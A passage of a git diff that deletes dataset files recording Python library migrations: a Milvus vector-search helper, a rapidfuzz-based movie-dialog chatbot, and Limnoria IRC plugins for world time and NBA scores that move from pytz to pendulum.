exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True,auto_id=True) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[ field1,field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - else: - self.set_collection(collection_name) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys - self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name): - try: - self.set_collection(collection_name) - default_index= {"index_type": "IVF_SQ8", "metric_type": METRIC_TYPE, "params": {"nlist": 16384}} - status= self.collection.create_index(field_name="embedding", index_params=default_index) - if not status.code: - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, default_index)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k): - try: - self.set_collection(collection_name) - search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": 16}} - # data = [vectors] - res=self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - print(res[0]) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num =self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) diff --git a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.target.py b/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.target.py deleted file mode 100644 index 55b5e52..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.target.py +++ /dev/null @@ -1,117 +0,0 @@ -import sys -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE -from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection =None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True,auto_id=True) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[ field1,field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - else: - self.set_collection(collection_name) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys - self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name): - try: - self.set_collection(collection_name) - default_index= {"index_type": "IVF_SQ8", "metric_type": METRIC_TYPE, "params": {"nlist": 16384}} - status= self.collection.create_index(field_name="embedding", index_params=default_index) - if not status.code: - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, default_index)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k): - try: - self.set_collection(collection_name) - search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": 16}} - # data = [vectors] - res=self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - print(res[0]) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num =self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) diff --git a/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.diff b/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.diff deleted file mode 100644 index c5baf31..0000000 --- a/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/qary/skills/search_fuzzy_bots.py b/qary/skills/search_fuzzy_bots.py - index abd37ec277a246595abf78fc20775ae3d7af1f84..054d5d207cba12d9b5c4765454be1c51424ea4f3 100644 - --- a/qary/skills/search_fuzzy_bots.py - +++ b/qary/skills/search_fuzzy_bots.py -@@ -5,7 +5,7 @@ import os - - import yaml - import pandas as pd --from fuzzywuzzy import process -+from rapidfuzz import process - from ..constants import DATA_DIR - - log = logging.getLogger(__name__) -@@ -83,7 +83,7 @@ class Bot: - return db - - def reply(self, statement, db=None): -- """ Use fuzzywuzzy to find the closest key in the dictionary then return the value for that key -+ """ Use rapidfuzz to find the closest key in the dictionary then return the value for that key - - >>> bot = MovieBot() - >>> reply = bot.reply diff --git a/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.source.py b/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.source.py deleted file mode 100644 index 69e3e2f..0000000 --- a/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.source.py +++ /dev/null @@ -1,117 +0,0 @@ -""" Text search to retrieve a statement """ -import logging -import sys -import os - -import yaml -import pandas as pd -from fuzzywuzzy import process -from ..constants import DATA_DIR - -log = logging.getLogger(__name__) - - -LIMIT = 1000000 - - -def get_data(name): - """ replacement for nlpia.loaders.get_data to avoid dependencies that result in version conflicts - - >>> get_data('movie_dialog').shape - (64350, 2) - """ - return pd.read_csv(os.path.join(DATA_DIR, name + '.csv')) - - -def normalize(text): - return text.lower() - - -def scale_probability(p): - """ Levenshtein similarity is only good when it's high, when it's low, the score should go down """ - return p ** 2 - - -def load_faq(faq_path=os.path.join(DATA_DIR, 'dsfaq_plus_faq_data_science_and_machine_learning.yml')): - faq = None - with open(faq_path, 'r') as instream: - try: - faq = yaml.safe_load(instream) - except yaml.YAMLError as e: - print(e) - raise(e) - for i, qa in enumerate(faq): - if not isinstance(qa, dict): - faq[i] = {} - log.warning(f'qa #{i} was not a dict') - continue - for k in qa: - if k.lower() != k: - qa[k.lower()] = qa.pop(k) - # if 'q' not in qa: - # log.warning(f'qa #{i} had no Question: {list(qa)} {qa[list(qa)[0]]}') - # qa['q'] = qa.pop('q_student', qa.pop('q_student2', qa.pop('q_teacher'))) - # if 'a' not in qa: - # log.warning(f'qa #{i} had no Answer: {list(qa)} {qa[list(qa)[0]]}') - # qa['a'] = qa.pop('a_teacher', qa.pop('a_teacher2', qa.pop('a_student'))) - # continue - faq = pd.DataFrame(faq) - faq = faq.dropna() - return faq - - -class Bot: - db = None - - def __init__(self, name='movie_dialog'): - self.limit = LIMIT - self.name = name - # TODO: make this lazy, do it inside reply() - self.db = self.load_dialog(name=name) - - def load_dialog(self, name='movie_dialog'): - log.warning('Loading movie dialog...') - if name == 'dsfaq': - db = load_faq() - else: - db = get_data(name) - log.info(f'Loaded {len(db)} {self.name} statement-reply pairs.') - if self.limit <= len(db): - log.info(f'Limiting {self.name} database to {self.limit} statement-reply pairs.') - db = db.iloc[:self.limit] - db = dict(zip(db[db.columns[0]], db[db.columns[1]])) - return db - - def reply(self, statement, db=None): - """ Use fuzzywuzzy to find the closest key in the dictionary then return the value for that key - - >>> bot = MovieBot() - >>> reply = bot.reply - >>> reply('hey', {'hello': 'world', 'goodbye': 'fantasy'}) - (0.3, 'fantasy') - >>> reply("Hi!") - (1.0, 'hey there. tired of breathing?') - """ - if self.db is None: - self.db = db - if self.db is None: - self.db = self.load_dialog() - movie_statement, percent_match, movie_reply = process.extractOne( - normalize(statement), choices=self.db) - log.info(f'Closest movie_statement = {movie_statement}') - return [((percent_match / 100.), movie_reply)] - - -# class FAQBot(Bot): -# def __init__(self, name='dsfaq'): -# self.limit = LIMIT -# # TODO: make this lazy, do it inside reply() -# self.db = self.load_dialog(name=name) -# BOTS = (Bot, FAQBot) - -if __name__ == '__main__': - if len(sys.argv) > 1: - bot = Bot() - statement = "Hi!" - statement = ' '.join(sys.argv[1:]) - print(bot.reply(statement)) diff --git a/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.target.py b/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.target.py deleted file mode 100644 index c40ea83..0000000 --- a/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.target.py +++ /dev/null @@ -1,117 +0,0 @@ -""" Text search to retrieve a statement """ -import logging -import sys -import os - -import yaml -import pandas as pd -from rapidfuzz import process -from ..constants import DATA_DIR - -log = logging.getLogger(__name__) - - -LIMIT = 1000000 - - -def get_data(name): - """ replacement for nlpia.loaders.get_data to avoid dependencies that result in version conflicts - - >>> get_data('movie_dialog').shape - (64350, 2) - """ - return pd.read_csv(os.path.join(DATA_DIR, name + '.csv')) - - -def normalize(text): - return text.lower() - - -def scale_probability(p): - """ Levenshtein similarity is only good when it's high, when it's low, the score should go down """ - return p ** 2 - - -def load_faq(faq_path=os.path.join(DATA_DIR, 'dsfaq_plus_faq_data_science_and_machine_learning.yml')): - faq = None - with open(faq_path, 'r') as instream: - try: - faq = yaml.safe_load(instream) - except yaml.YAMLError as e: - print(e) - raise(e) - for i, qa in enumerate(faq): - if not isinstance(qa, dict): - faq[i] = {} - log.warning(f'qa #{i} was not a dict') - continue - for k in qa: - if k.lower() != k: - qa[k.lower()] = qa.pop(k) - # if 'q' not in qa: - # log.warning(f'qa #{i} had no Question: {list(qa)} {qa[list(qa)[0]]}') - # qa['q'] = qa.pop('q_student', qa.pop('q_student2', qa.pop('q_teacher'))) - # if 'a' not in qa: - # log.warning(f'qa #{i} had no Answer: {list(qa)} {qa[list(qa)[0]]}') - # qa['a'] = qa.pop('a_teacher', qa.pop('a_teacher2', qa.pop('a_student'))) - # continue - faq = pd.DataFrame(faq) - faq = faq.dropna() - return faq - - -class Bot: - db = None - - def __init__(self, name='movie_dialog'): - self.limit = LIMIT - self.name = name - # TODO: make this lazy, do it inside reply() - self.db = self.load_dialog(name=name) - - def load_dialog(self, name='movie_dialog'): - log.warning('Loading movie dialog...') - if name == 'dsfaq': - db = load_faq() - else: - db = get_data(name) - log.info(f'Loaded {len(db)} {self.name} statement-reply pairs.') - if self.limit <= len(db): - log.info(f'Limiting {self.name} database to {self.limit} statement-reply pairs.') - db = db.iloc[:self.limit] - db = dict(zip(db[db.columns[0]], db[db.columns[1]])) - return db - - def reply(self, statement, db=None): - """ Use rapidfuzz to find the closest key in the dictionary then return the value for that key - - >>> bot = MovieBot() - >>> reply = bot.reply - >>> reply('hey', {'hello': 'world', 'goodbye': 'fantasy'}) - (0.3, 'fantasy') - >>> reply("Hi!") - (1.0, 'hey there. tired of breathing?') - """ - if self.db is None: - self.db = db - if self.db is None: - self.db = self.load_dialog() - movie_statement, percent_match, movie_reply = process.extractOne( - normalize(statement), choices=self.db) - log.info(f'Closest movie_statement = {movie_statement}') - return [((percent_match / 100.), movie_reply)] - - -# class FAQBot(Bot): -# def __init__(self, name='dsfaq'): -# self.limit = LIMIT -# # TODO: make this lazy, do it inside reply() -# self.db = self.load_dialog(name=name) -# BOTS = (Bot, FAQBot) - -if __name__ == '__main__': - if len(sys.argv) > 1: - bot = Bot() - statement = "Hi!" - statement = ' '.join(sys.argv[1:]) - print(bot.reply(statement)) diff --git a/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.diff b/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.diff deleted file mode 100644 index f657bb4..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.diff +++ /dev/null @@ -1,46 +0,0 @@ -diff --git a/WorldTime/plugin.py b/WorldTime/plugin.py - index bbe015d69556fe33bfee7231c9ba12bb7f728b75..2c40713d3a2778d6f729d896372c3bcd74302104 100644 - --- a/WorldTime/plugin.py - +++ b/WorldTime/plugin.py -@@ -9,9 +9,8 @@ - import sys - import json - import time --import pytz --import datetime - import pickle -+import pendulum - - # supybot libs - import supybot.utils as utils -@@ -79,15 +78,14 @@ class WorldTime(callbacks.Plugin): - # TIME FUNCTIONS # - ################## - -- def _converttz(self, msg, s, outputTZ): -+ def _converttz(self, msg, outputTZ): - """Convert epoch seconds to a HH:MM readable string.""" - - # now do some timezone math. - try: -- dtobj = datetime.datetime.fromtimestamp(s, tz=pytz.timezone(outputTZ)) # convert epoch into aware dtobj. -+ dt = pendulum.now(outputTZ) - outstrf = self.registryValue("format", msg.args[0]) -- local_dt = dtobj.astimezone(pytz.timezone(outputTZ)) -- return local_dt.strftime(outstrf) -+ return dt.strftime(outstrf) - except Exception as e: - self.log.info("WorldTime: ERROR: _converttz: {0}".format(e)) - -@@ -174,10 +172,7 @@ class WorldTime(callbacks.Plugin): - if not ll: - irc.error("I could not find the local timezone for: {0}. Bad location? Spelled wrong?".format(location), Raise=True) - # if we're here, we have localtime zone. -- utcnow = int(time.time()) # grab UTC now. -- # localtm = utcnow+ll['rawOffset'] # grab raw offset from -- # now lets use pytz to convert into the localtime in the place. -- lt = self._converttz(msg, utcnow, ll['timeZoneId']) -+ lt = self._converttz(msg, ll['timeZoneId']) - if lt: # make sure we get it back. - if sys.version_info[0] <= 2: - s = "{0} :: Current local time is: {1} ({2})".format(ircutils.bold(gc['place'].encode('utf-8')), lt, ll['timeZoneName'].encode('utf-8')) diff --git a/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.source.py b/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.source.py deleted file mode 100644 index 4de97f9..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.source.py +++ /dev/null @@ -1,217 +0,0 @@ -### -# Copyright (c) 2014, spline -# All rights reserved. -# -# -### - -# my libs -import sys -import json -import time -import pytz -import datetime -import pickle - -# supybot libs -import supybot.utils as utils -from supybot.commands import * -import supybot.plugins as plugins -import supybot.ircutils as ircutils -import supybot.callbacks as callbacks -import supybot.world as world -import supybot.conf as conf -import supybot.log as log -try: - from supybot.i18n import PluginInternationalization - _ = PluginInternationalization('WorldTime') -except ImportError: - # Placeholder that allows to run the plugin on a bot - # without the i18n module - _ = lambda x:x - -filename = conf.supybot.directories.data.dirize('WorldTime.db') - -HEADERS = { - 'User-agent': 'Mozilla/5.0 (compatible; Supybot/Limnoria %s; WorldTime plugin)' % conf.version -} - -class WorldTime(callbacks.Plugin): - """Add the help for "@plugin help WorldTime" here - This should describe *how* to use this plugin.""" - threaded = True - - ############################### - # DATABASE HANDLING FUNCTIONS # - ############################### - - def __init__(self, irc): - self.__parent = super(WorldTime, self) - self.__parent.__init__(irc) - self.db = {} - self._loadDb() - world.flushers.append(self._flushDb) - - def _loadDb(self): - """Loads the (flatfile) database mapping ident@hosts to timezones.""" - - try: - with open(filename, 'rb') as f: - self.db = pickle.load(f) - except Exception as e: - self.log.debug('WorldTime: Unable to load pickled database: %s', e) - - def _flushDb(self): - """Flushes the (flatfile) database mapping ident@hosts to timezones.""" - - try: - with open(filename, 'wb') as f: - pickle.dump(self.db, f, 2) - except Exception as e: - self.log.warning('WorldTime: Unable to write pickled database: %s', e) - - def die(self): - self._flushDb() - world.flushers.remove(self._flushDb) - self.__parent.die() - - ################## - # TIME FUNCTIONS # - ################## - - def _converttz(self, msg, s, outputTZ): - """Convert epoch seconds to a HH:MM readable string.""" - - # now do some timezone math. - try: - dtobj = datetime.datetime.fromtimestamp(s, tz=pytz.timezone(outputTZ)) # convert epoch into aware dtobj. - outstrf = self.registryValue("format", msg.args[0]) - local_dt = dtobj.astimezone(pytz.timezone(outputTZ)) - return local_dt.strftime(outstrf) - except Exception as e: - self.log.info("WorldTime: ERROR: _converttz: {0}".format(e)) - - ############## - # GAPI STUFF # - ############## - - def _getlatlng(self, location): - api_key = self.registryValue('mapsAPIkey') - location = utils.web.urlquote(location) - url = 'https://maps.googleapis.com/maps/api/geocode/json?address=%s&sensor=false&key=%s' % (location, api_key) - - # try and fetch url - try: - response = utils.web.getUrl(url, headers=HEADERS) - except utils.web.Error as e: - log.debug(str(e)) - - # wrap in a big try/except - try: - result = json.loads(response.decode('utf-8')) - if result['status'] == 'OK': - lat = str(result['results'][0]['geometry']['location']['lat']) - lng = str(result['results'][0]['geometry']['location']['lng']) - place = (result['results'][0]['formatted_address']) - ll = '%s,%s' % (lat, lng) # lat+long into a single string. - return {'place':place, 'll':ll} - else: - self.log.info("ERROR: _getlatlng: status result NOT ok. Result: {0}".format(result)) - except Exception as e: - self.log.info("ERROR: _getlatlng: {0}".format(e)) - - def _gettime(self, latlng): - api_key = self.registryValue('mapsAPIkey') - latlng = utils.web.urlquote(latlng) - url = 'https://maps.googleapis.com/maps/api/timezone/json?location=%s&sensor=false×tamp=%s&key=%s' % (latlng, time.time(), api_key) - - # try and fetch url - try: - response = utils.web.getUrl(url, headers=HEADERS) - except utils.web.Error as e: - log.debug(str(e)) - - # wrap in a big try/except - try: - result = json.loads(response.decode('utf-8')) - if result['status'] == 'OK': - return result - else: - self.log.info("WorldTime: _gettime: status result NOT ok. Result: {0}".format(result)) - except Exception as e: - self.log.info("WorldTime: _gettime: {0}".format(e)) - - ################### - # PUBLIC FUNCTION # - ################### - - def worldtime(self, irc, msg, args, opts, location): - """[--nick ] - - Query GAPIs for and attempt to figure out local time. [] - is only required if you have not yet set a location for yourself using the 'set' - command. If --nick is given, try looking up the location for . - """ - opts = dict(opts) - if not location: - try: - if 'nick' in opts: - host = irc.state.nickToHostmask(opts['nick']) - else: - host = msg.prefix - ih = host.split('!')[1] - location = self.db[ih] - except KeyError: - irc.error("No location for %s is set. Use the 'set' command " - "to set a location for your current hostmask, or call 'worldtime' " - "with as an argument." % ircutils.bold('*!'+ih), Raise=True) - # first, grab lat and long for user location - gc = self._getlatlng(location) - if not gc: - irc.error("I could not find the location for: {0}. Bad location? Spelled wrong?".format(location), Raise=True) - # next, lets grab the localtime for that location w/lat+long. - ll = self._gettime(gc['ll']) - if not ll: - irc.error("I could not find the local timezone for: {0}. Bad location? Spelled wrong?".format(location), Raise=True) - # if we're here, we have localtime zone. - utcnow = int(time.time()) # grab UTC now. - # localtm = utcnow+ll['rawOffset'] # grab raw offset from - # now lets use pytz to convert into the localtime in the place. - lt = self._converttz(msg, utcnow, ll['timeZoneId']) - if lt: # make sure we get it back. - if sys.version_info[0] <= 2: - s = "{0} :: Current local time is: {1} ({2})".format(ircutils.bold(gc['place'].encode('utf-8')), lt, ll['timeZoneName'].encode('utf-8')) - else: - s ="{0} :: Current local time is: {1} ({2})".format(ircutils.bold(gc['place']), lt, ll['timeZoneName']) - if self.registryValue('disableANSI', msg.args[0]): - s = ircutils.stripFormatting(s) - irc.reply(s) - else: - irc.error("Something went wrong during conversion to timezone. Check the logs.", Raise=True) - - worldtime = wrap(worldtime, [getopts({'nick': 'nick'}), additional('text')]) - - def set(self, irc, msg, args, timezone): - """ - - Sets the location for your current ident@host to .""" - ih = msg.prefix.split('!')[1] - self.db[ih] = timezone - irc.replySuccess() - set = wrap(set, ['text']) - - def unset(self, irc, msg, args): - """takes no arguments. - - Unsets the location for your current ident@host.""" - ih = msg.prefix.split('!')[1] - try: - del self.db[ih] - irc.replySuccess() - except KeyError: - irc.error("No entry for %s exists." % ircutils.bold('*!'+ih), Raise=True) - -Class = WorldTime - - -# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: diff --git a/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.target.py b/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.target.py deleted file mode 100644 index 197feb6..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__2c40713__WorldTime$plugin.py.target.py +++ /dev/null @@ -1,212 +0,0 @@ -### -# Copyright (c) 2014, spline -# All rights reserved. -# -# -### - -# my libs -import sys -import json -import time -import pickle -import pendulum - -# supybot libs -import supybot.utils as utils -from supybot.commands import * -import supybot.plugins as plugins -import supybot.ircutils as ircutils -import supybot.callbacks as callbacks -import supybot.world as world -import supybot.conf as conf -import supybot.log as log -try: - from supybot.i18n import PluginInternationalization - _ = PluginInternationalization('WorldTime') -except ImportError: - # Placeholder that allows to run the plugin on a bot - # without the i18n module - _ = lambda x:x - -filename = conf.supybot.directories.data.dirize('WorldTime.db') - -HEADERS = { - 'User-agent': 'Mozilla/5.0 (compatible; Supybot/Limnoria %s; WorldTime plugin)' % conf.version -} - -class WorldTime(callbacks.Plugin): - """Add the help for "@plugin help WorldTime" here - This should describe *how* to use this plugin.""" - threaded = True - - ############################### - # DATABASE HANDLING FUNCTIONS # - ############################### - - def __init__(self, irc): - self.__parent = super(WorldTime, self) - self.__parent.__init__(irc) - self.db = {} - self._loadDb() - world.flushers.append(self._flushDb) - - def _loadDb(self): - """Loads the (flatfile) database mapping ident@hosts to timezones.""" - - try: - with open(filename, 'rb') as f: - self.db = pickle.load(f) - except Exception as e: - self.log.debug('WorldTime: Unable to load pickled database: %s', e) - - def _flushDb(self): - """Flushes the (flatfile) database mapping ident@hosts to timezones.""" - - try: - with open(filename, 'wb') as f: - pickle.dump(self.db, f, 2) - except Exception as e: - self.log.warning('WorldTime: Unable to write pickled database: %s', e) - - def die(self): - self._flushDb() - world.flushers.remove(self._flushDb) - self.__parent.die() - - ################## - # TIME FUNCTIONS # - ################## - - def _converttz(self, msg, outputTZ): - """Convert epoch seconds to a HH:MM readable string.""" - - # now do some timezone math. - try: - dt = pendulum.now(outputTZ) - outstrf = self.registryValue("format", msg.args[0]) - return dt.strftime(outstrf) - except Exception as e: - self.log.info("WorldTime: ERROR: _converttz: {0}".format(e)) - - ############## - # GAPI STUFF # - ############## - - def _getlatlng(self, location): - api_key = self.registryValue('mapsAPIkey') - location = utils.web.urlquote(location) - url = 'https://maps.googleapis.com/maps/api/geocode/json?address=%s&sensor=false&key=%s' % (location, api_key) - - # try and fetch url - try: - response = utils.web.getUrl(url, headers=HEADERS) - except utils.web.Error as e: - log.debug(str(e)) - - # wrap in a big try/except - try: - result = json.loads(response.decode('utf-8')) - if result['status'] == 'OK': - lat = str(result['results'][0]['geometry']['location']['lat']) - lng = str(result['results'][0]['geometry']['location']['lng']) - place = (result['results'][0]['formatted_address']) - ll = '%s,%s' % (lat, lng) # lat+long into a single string. - return {'place':place, 'll':ll} - else: - self.log.info("ERROR: _getlatlng: status result NOT ok. Result: {0}".format(result)) - except Exception as e: - self.log.info("ERROR: _getlatlng: {0}".format(e)) - - def _gettime(self, latlng): - api_key = self.registryValue('mapsAPIkey') - latlng = utils.web.urlquote(latlng) - url = 'https://maps.googleapis.com/maps/api/timezone/json?location=%s&sensor=false×tamp=%s&key=%s' % (latlng, time.time(), api_key) - - # try and fetch url - try: - response = utils.web.getUrl(url, headers=HEADERS) - except utils.web.Error as e: - log.debug(str(e)) - - # wrap in a big try/except - try: - result = json.loads(response.decode('utf-8')) - if result['status'] == 'OK': - return result - else: - self.log.info("WorldTime: _gettime: status result NOT ok. Result: {0}".format(result)) - except Exception as e: - self.log.info("WorldTime: _gettime: {0}".format(e)) - - ################### - # PUBLIC FUNCTION # - ################### - - def worldtime(self, irc, msg, args, opts, location): - """[--nick ] - - Query GAPIs for and attempt to figure out local time. [] - is only required if you have not yet set a location for yourself using the 'set' - command. If --nick is given, try looking up the location for . - """ - opts = dict(opts) - if not location: - try: - if 'nick' in opts: - host = irc.state.nickToHostmask(opts['nick']) - else: - host = msg.prefix - ih = host.split('!')[1] - location = self.db[ih] - except KeyError: - irc.error("No location for %s is set. Use the 'set' command " - "to set a location for your current hostmask, or call 'worldtime' " - "with as an argument." % ircutils.bold('*!'+ih), Raise=True) - # first, grab lat and long for user location - gc = self._getlatlng(location) - if not gc: - irc.error("I could not find the location for: {0}. Bad location? Spelled wrong?".format(location), Raise=True) - # next, lets grab the localtime for that location w/lat+long. - ll = self._gettime(gc['ll']) - if not ll: - irc.error("I could not find the local timezone for: {0}. Bad location? Spelled wrong?".format(location), Raise=True) - # if we're here, we have localtime zone. - lt = self._converttz(msg, ll['timeZoneId']) - if lt: # make sure we get it back. - if sys.version_info[0] <= 2: - s = "{0} :: Current local time is: {1} ({2})".format(ircutils.bold(gc['place'].encode('utf-8')), lt, ll['timeZoneName'].encode('utf-8')) - else: - s ="{0} :: Current local time is: {1} ({2})".format(ircutils.bold(gc['place']), lt, ll['timeZoneName']) - if self.registryValue('disableANSI', msg.args[0]): - s = ircutils.stripFormatting(s) - irc.reply(s) - else: - irc.error("Something went wrong during conversion to timezone. Check the logs.", Raise=True) - - worldtime = wrap(worldtime, [getopts({'nick': 'nick'}), additional('text')]) - - def set(self, irc, msg, args, timezone): - """ - - Sets the location for your current ident@host to .""" - ih = msg.prefix.split('!')[1] - self.db[ih] = timezone - irc.replySuccess() - set = wrap(set, ['text']) - - def unset(self, irc, msg, args): - """takes no arguments. - - Unsets the location for your current ident@host.""" - ih = msg.prefix.split('!')[1] - try: - del self.db[ih] - irc.replySuccess() - except KeyError: - irc.error("No entry for %s exists." % ircutils.bold('*!'+ih), Raise=True) - -Class = WorldTime - - -# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: diff --git a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.diff b/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.diff deleted file mode 100644 index 7be75fd..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.diff +++ /dev/null @@ -1,116 +0,0 @@ -diff --git a/NBA/plugin.py b/NBA/plugin.py - index e0266f6987d1e60d6d4f343d0edcd2cbe2407251..33c7a3fc0878d87ee803db91c17523a9e61af3ed 100644 - --- a/NBA/plugin.py - +++ b/NBA/plugin.py -@@ -35,6 +35,11 @@ from supybot.commands import optional, wrap - #import supybot.plugins as plugins - import supybot.ircutils as ircutils - import supybot.callbacks as callbacks -+import httplib2 -+import json -+import pendulum -+from xml.etree import ElementTree -+ - try: - from supybot.i18n import PluginInternationalization - _ = PluginInternationalization('NBA') -@@ -43,13 +48,6 @@ except ImportError: - # without the i18n module - _ = lambda x: x - --import datetime --import dateutil.parser --import httplib2 --import json --import pytz --from xml.etree import ElementTree -- - class NBA(callbacks.Plugin): - """Get scores from NBA.com.""" - -@@ -136,7 +134,12 @@ class NBA(callbacks.Plugin): - if nugget_is_interesting: - games_string += ' | {}'.format(nugget) - -- irc.reply(games_string) -+ if date: -+ date = pendulum.from_format(date, 'YYYYMMDD').to_date_string() -+ else: -+ date = pendulum.now().to_date_string() -+ -+ irc.reply("{0}: {1}".format(date, games_string)) - - nba = wrap(nba, [optional('somethingWithoutSpaces'), - optional('somethingWithoutSpaces')]) -@@ -669,11 +672,11 @@ class NBA(callbacks.Plugin): - - @staticmethod - def _easternTimeNow(): -- return datetime.datetime.now(pytz.timezone('US/Eastern')) -+ return pendulum.now('US/Eastern') - - @staticmethod - def _pacificTimeNow(): -- return datetime.datetime.now(pytz.timezone('US/Pacific')) -+ return 